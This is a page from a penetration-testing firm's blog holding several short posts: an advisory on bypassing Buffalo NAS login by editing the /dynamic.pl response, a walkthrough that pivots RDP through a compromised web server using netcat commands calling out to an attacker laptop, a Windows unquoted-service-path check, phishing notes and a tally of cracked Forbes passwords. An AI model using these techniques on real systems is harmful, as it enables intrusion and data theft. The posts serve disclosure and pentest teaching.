A blog about generally interesting infosec stuff by Darren Fuller/Paul Marsh, SecQuest Information Security https://www.secquest.co.uk

Friday, 16 October 2015

Security Advisory: Buffalo NAS Authentication Bypass

Security Advisory
Buffalo LinkStation/TeraStation Authentication Bypass 

Manufacturer: Buffalo Technology - http://www.buffalotech.com
Affected Products: LinkStation/Terastation NAS Devices
Affected Firmware: Seen in 1.69 and below 
Fixed Firmware: 1.71
Risk: Critical data loss/access to sensitive information
Vendor Status: Firmware Update Released

General Information
During a client penetration test, SecQuest consultants found that it was possible to bypass authentication on Buffalo NAS devices by modifying the response to the login request.

This allows full access at administrator level giving complete control of the device. Using the admin interface it is possible to add a new user and open the device up for remote file sharing via Buffalo's "webaccess" functionality.

This would give access to all data contained on the device. A malicious attacker could alternatively format the storage or delete RAID arrays potentially resulting in data loss.

The response from a POST request to /dynamic.pl can be modified in a proxy to allow access using ANY username and password by changing the "success" and "pagemode" parameters as follows:

Original response

Modified response

Vulnerability confirmed in firmware versions 1.10, 1.15, 1.34, 1.41, 1.50, 1.52, 1.56, 1.59, 1.60, 1.63, 1.64, 1.65, 1.66, 1.68, 1.69

Discovered by Darren Fuller (darren [at] secquest.co.uk)

Independently discovered by Red Team Pentesting -> Link

16-Oct-2015 Exploit is in the wild, blog post published
07-Jul-2015 Vendor has no update from engineering team
25-Jun-2015 Update requested from vendor
06-Mar-2015 Vendor is liasing with engineering team in Japan
04-Mar-2015 Update requested from vendor
22-Jan-2015 Technical team confirms vulnerability, fix being created
19-Jan-2015 Update requested from vendor
05-Jan-2015 Update requested from vendor
23-Dec-2014 Vulnerability information passed on to vendor
16-Dec-2014 Alternate contact at vendor requested
16-Dec-2014 Vendor response, case reference ID: 0-80368
15-Dec-2014 Vendor contacted via web support form

Wednesday, 4 March 2015

Pivoting RDP with Netcat

Whilst on a recent test we managed to get a simple PHP command shell uploaded to a web server which was running Linux. We found some information about back-end Windows systems including credentials and needed a way of getting remote desktop access.

This subject has been discussed previously but we thought we'd document it again as it's a cool trick!

The network looked a bit like this for our purposes:
Our hacker is connected to the webserver which we've got a PHP command shell on. We know that there are Windows boxes on the back-end so needed a way to get comms tunnelled through to them. At this point we could use something like Meterpreter but wanted a quick/dirty solution that didn't involve creating files, uploading etc. Fortunaely the system had netcat installed!

So firstly we needed netcat to listen on port 53 (DNS) for comms from the WWW server (we'd worked out that the firewall allowed 53 outbound from the webserver). Getting the server to initiate the connection is more polite than opening up a remote port!

The following command sets up a listener on TCP 53 then relays that connection via anther netcat instance to a local listener on RDP port 3389:

nc -l -p 53 -e nc -l -p 3389

From the PHP command shell we had on the WWW server we then ran the following command:

nc hacker-laptop -p 53 -e nc windows-server -p 3389

This caused the WWW server to create an outbound connection to our laptop which in turn started another listener locally on TCP 3389:

It also created a connection between the WWW server and the Windows server:

So by RDP'ing to localhost the connection was channeled over netcat through the WWW server and on to the RDP port of the Windows server, game over followed shortly!

Again, proof that netcat rocks!

Friday, 9 May 2014

Lloyds Bank "PCI DSS" Malware

In common with the Facebook scam post earlier we don't usually bother blogging about malware and phishing emails as they're usually handled well by companies and are pretty common.. this email was a bit more interesting.

Had an email from Lloyds Bank <pciportal@lloydsbankcardnetpcidss.com> entitled PCI DSS Compliance Programme:
Looks pretty legit.. PCI too, that's a security thing isn't it!  The attachment looked like this:

So PDF icon with a .scr suffix. That's a Windows screensaver file which will run the code the same as a .exe when it's double clicked (for our younger viewers).

Basically it's a known piece of malware with reasonable detection according to Virus Total:

Interesting all the same, obviously targeted at business rather than end user targets. Be vigilant!

Wednesday, 9 April 2014

Trend Micro File Harvesting

Going back a year or two we blogged about Microsoft's SmartScreen filter sending potentially sensitive file information to Microsoft's servers who download files after they've been downloaded by Internet Explorer.  If you're putting super-secret-file.zip on a server for someone you probably don't want anyone else coming along and hoovering that up!

We've recently become aware that some versions of Trend antivirus products do exactly the same..

Sunday, 16 February 2014

Forbes Cracked Passwords from Feb 2014

Did a really quick analysis of the Forbes password hashes leaked by the Syrian Electronic Army earlier. From the 1,071,734 password hashes that hashcat recognised as WordPress, 2713 were cracked in about 30 minutes.

There were no switches, GPUs, rules or anything used.. I just used the unedited top 25 passwords taken from the top 10,000 list published by Mark Burnett (xato.net). -> blog post here

The results show that 975 people have 123456 as a password.. some things never change! Top 25 cracked hashes follow:

fully@SQ:~/hc$ cat forbescracked.txt|cut -d : -f 2| sort|uniq -c|sort -r -n
    975 123456
    534 password
    159 qwerty
    147 12345678
    146 abc123
    111 111111
     75 letmein
     66 monkey
     64 baseball
     62 1234567
     50 shadow
     35 michael
     32 jordan
     31 dragon
     29 superman
     29 master
     28 mustang
     28 football
     25 harley
     23 jennifer

     22 696969
     21 12345
     18 1234
      2 2000
      1 pussy

Thursday, 16 January 2014

Microsoft Windows Unquoted Service Path Exploit

It's been over a year since this Windows issue has had credentialed checks available in Nessus and it showed up again on a recent test. If you're not aware of the issue http://www.commonexploits.com/unquoted-service-paths/ has a great writeup and is referenced in the associated Nessus plugin (Nessus plugin ID 63155)

In a nutshell this vulnerability is due to some Windows paths for services in the registry not being "enclosed with quotes". Believe it or not but when Windows sees the following: C:\Program Files\Test App\app.exe it tries to run the executable like this:

C:\Program Files\Test.exe
C:\Program Files\Test App\app.exe

On the Common Exploits blog Daniel has given us a handy command to check for vulnerable services:

C:\>wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

I ran that on a system and got the following results:

CorsairSSDTool  CorsairSSDToolBox  C:\Program Files\Corsair SSD Toolbox\CSSDT Service.exe  Auto
Internet Pass-Through Service  PassThru Service  C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe Auto

Metasploit has a privilege escalation module to take advantage of this but I couldn't find a simple standalone way of showing a proof of concept for this issue.  Taking the easy option and copying cmd.exe to the path fails to execute as it is not a proper Windows service application, we decided to write our own service to demo this!

Monday, 9 December 2013

Facebook Badness

As an infosec company we don't tend to blog about Facebook scams such as "Free £100 Tesco voucher" or "Apple is giving away 1000 iPads because the boxes are scuffed" - surely a new box is cheaper + we'd be here all day tracing them!

However, this one peaked our interest as it is something that could just as well affect a company as an individual. This is pretty much a classic phishing exercise with a bit of social engineering thrown in for good measure, it's quite well executed though so on with the details..

I had a private Facebook message from a family member come through which cc'd a number of other family members/friends. This is what the message looked like (blurred to protect the innocent!):

Alarm bells started ringing; a PM with a generic message along with a URL shortened using "t.co" which is a classic obfuscation technique.  The "Facebooky" looking thumbs up adds a certain amount of credibility as it was posted by another family member, surely they can be trusted, right?